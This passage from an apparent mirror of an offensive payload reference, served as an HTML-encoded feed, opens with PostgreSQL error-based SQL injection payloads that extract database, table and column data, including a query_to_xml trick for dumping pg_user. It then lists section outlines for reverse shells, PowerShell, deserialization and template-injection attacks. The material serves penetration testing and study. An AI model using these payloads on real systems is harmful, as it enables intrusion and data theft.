&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;CAST&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;data_column&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;data_table&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;LIMIT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;offset&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;data_offset&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="n"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;&amp;#39; and 1=cast((SELECT concat(&amp;#39;&lt;/span&gt;&lt;span class="k"&gt;DATABASE&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;,current_database())) as int) and &amp;#39;&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;&amp;#39; and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and &amp;#39;&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;&amp;#39; and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name=&amp;#39;&lt;/span&gt;&lt;span class="n"&gt;data_table&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; LIMIT 1 OFFSET data_offset) as int) and &amp;#39;&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;&amp;#39; and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and &amp;#39;&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="postgresql-xml-helpers" class="anchored-heading"&gt;PostgreSQL XML Helpers&lt;a class="heading-anchor" href="#postgresql-xml-helpers" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;query_to_xml&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;select * from pg_user&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="k"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="k"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;-- returns all the results as a single xml row
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;query_to_xml&lt;/code&gt; above returns all the results of the specified query as a single result. Chain this with the &lt;a href="#postgresql-error-based"&gt;PostgreSQL Error Based&lt;/a&gt; technique to exfiltrate data without having to worry about &lt;code&gt;LIMIT&lt;/code&gt;ing your query to one result.&lt;/p&gt;</description></item><item><title>Powershell</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/powershell-cheatsheet/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/powershell-cheatsheet/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/"&gt;InternalAllTheThings/cheatsheets/powershell&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#execution-policy"&gt;Execution Policy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands"&gt;Encoded Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#constrained-mode"&gt;Constrained Mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands"&gt;Encoded Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#download-file"&gt;Download file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-powershell-scripts"&gt;Load Powershell scripts&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-c-assembly-reflectively"&gt;Load Chttps://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/# assembly reflectively&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#call-win-api-using-delegate-functions-with-reflection"&gt;Call Win API using delegate functions with Reflection&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#resolve-address-functions"&gt;Resolve address functions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#delegatetype-reflection"&gt;DelegateType Reflection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#example-with-a-simple-shellcode-runner"&gt;Example with a simple shellcode runner&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#secure-string-to-plaintext"&gt;Secure String to Plaintext&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Python Deserialization</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/python/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/python/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#methodology"&gt;Methodology&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#pickle"&gt;Pickle&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#pyyaml"&gt;PyYAML&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/j0lt-github/python-deserialization-attack-payload-generator"&gt;j0lt-github/python-deserialization-attack-payload-generator&lt;/a&gt; - Serialized payload for deserialization RCE attack on python driven applications where pickle,PyYAML, ruamel.yaml or jsonpickle module is used for deserialization of serialized data.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="methodology" class="anchored-heading"&gt;Methodology&lt;a class="heading-anchor" href="#methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;In Python source code, look for these sinks:&lt;/p&gt;</description></item><item><title>Reverse Shell Cheat Sheet</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/reverse-shell-cheatsheet/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/reverse-shell-cheatsheet/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/"&gt;InternalAllTheThings/cheatsheet/shell-reverse&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#reverse-shell"&gt;Reverse Shell&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#awk"&gt;Awk&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#revshells"&gt;Automatic Reverse Shell Generator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-tcp"&gt;Bash TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-udp"&gt;Bash UDP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#c"&gt;C&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#dart"&gt;Dart&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#golang"&gt;Golang&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#groovy-alternative-1"&gt;Groovy Alternative 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#groovy"&gt;Groovy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#java-alternative-1"&gt;Java Alternative 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#java-alternative-2"&gt;Java Alternative 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#java"&gt;Java&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#lua"&gt;Lua&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#ncat"&gt;Ncat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#netcat-openbsd"&gt;Netcat OpenBsd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#netcat-busybox"&gt;Netcat BusyBox&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#netcat-traditional"&gt;Netcat Traditional&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#nodejs"&gt;NodeJS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#ognl"&gt;OGNL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#openssl"&gt;OpenSSL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#perl"&gt;Perl&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#php"&gt;PHP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#powershell"&gt;Powershell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#python"&gt;Python&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#ruby"&gt;Ruby&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#rust"&gt;Rust&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#socat"&gt;Socat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#telnet"&gt;Telnet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#war"&gt;War&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#meterpreter-shell"&gt;Meterpreter Shell&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#windows-staged-reverse-tcp"&gt;Windows Staged reverse TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#windows-stageless-reverse-tcp"&gt;Windows Stageless reverse TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#linux-staged-reverse-tcp"&gt;Linux Staged reverse TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#linux-stageless-reverse-tcp"&gt;Linux Stageless reverse TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#other-platforms"&gt;Other platforms&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#spawn-tty-shell"&gt;Spawn TTY Shell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Ruby Deserialization</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/ruby/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/ruby/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Ruby deserialization is the process of converting serialized data back into Ruby objects, often using formats like YAML, Marshal, or JSON. Ruby&amp;rsquo;s Marshal module, for instance, is commonly used for this, as it can serialize and deserialize complex Ruby objects.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#marshal-deserialization"&gt;Marshal Deserialization&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#yaml-deserialization"&gt;YAML Deserialization&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="marshal-deserialization" class="anchored-heading"&gt;Marshal Deserialization&lt;a class="heading-anchor" href="#marshal-deserialization" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5&lt;/p&gt;</description></item><item><title>Server Side Template Injection - ASP.NET</title><link>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/asp/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/asp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Server-Side Template Injection (SSTI) is a class of vulnerabilities where an attacker can inject malicious input into a server-side template, causing the template engine to execute arbitrary code on the server. In the context of ASP.NET, SSTI can occur if user input is directly embedded into a template (such as Razor, ASPX, or other templating engines) without proper sanitization.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#aspnet-razor"&gt;ASP.NET Razor&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#aspnet-razor---basic-injection"&gt;ASP.NET Razor - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#aspnet-razor---command-execution"&gt;ASP.NET Razor - Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="aspnet-razor" class="anchored-heading"&gt;ASP.NET Razor&lt;a class="heading-anchor" href="#aspnet-razor" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c"&gt;Official website&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Server Side Template Injection - Elixir</title><link>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/elixir/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/elixir/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#templating-libraries"&gt;Templating Libraries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#universal-payloads"&gt;Universal Payloads&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eex"&gt;EEx&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#eex---basic-injections"&gt;EEx - Basic injections&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eex---retrieve-etcpasswd"&gt;EEx - Retrieve /etc/passwd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eex---remote-command-execution"&gt;EEx - Remote Command execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="templating-libraries" class="anchored-heading"&gt;Templating Libraries&lt;a class="heading-anchor" href="#templating-libraries" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Template Name&lt;/th&gt;
 &lt;th&gt;Payload Format&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;EEx&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;%= %&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;LEEx&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;%= %&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;HEEx&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;%= %&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="universal-payloads" class="anchored-heading"&gt;Universal Payloads&lt;a class="heading-anchor" href="#universal-payloads" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx.&lt;/p&gt;</description></item><item><title>Server Side Template Injection - Java</title><link>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/java/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/java/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Server-Side Template Injection (SSTI) is a security vulnerability that occurs when user input is embedded into server-side templates in an unsafe manner, allowing attackers to inject and execute arbitrary code. In Java, SSTI can be particularly dangerous due to the power and flexibility of Java-based templating engines such as JSP (JavaServer Pages), Thymeleaf, and FreeMarker.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#templating-libraries"&gt;Templating Libraries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#java-el"&gt;Java EL&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#java-el---basic-injection"&gt;Java EL - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#java-el---code-execution"&gt;Java EL - Code Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#freemarker"&gt;Freemarker&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#freemarker---basic-injection"&gt;Freemarker - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#freemarker---read-file"&gt;Freemarker - Read File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#freemarker---code-execution"&gt;Freemarker - Code Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#freemarker---code-execution-with-obfuscation"&gt;Freemarker - Code Execution with Obfuscation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#freemarker---sandbox-bypass"&gt;Freemarker - Sandbox Bypass&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinjava"&gt;Jinjava&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#jinjava---basic-injection"&gt;Jinjava - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinjava---command-execution"&gt;Jinjava - Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#pebble"&gt;Pebble&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#pebble---basic-injection"&gt;Pebble - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#pebble---code-execution"&gt;Pebble - Code Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#velocity"&gt;Velocity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#groovy"&gt;Groovy&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#groovy---basic-injection"&gt;Groovy - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#groovy---read-file"&gt;Groovy - Read File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#groovy---http-request"&gt;Groovy - HTTP Request:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#groovy---command-execution"&gt;Groovy - Command Execution&lt;/a&gt;&lt;/li&gt;
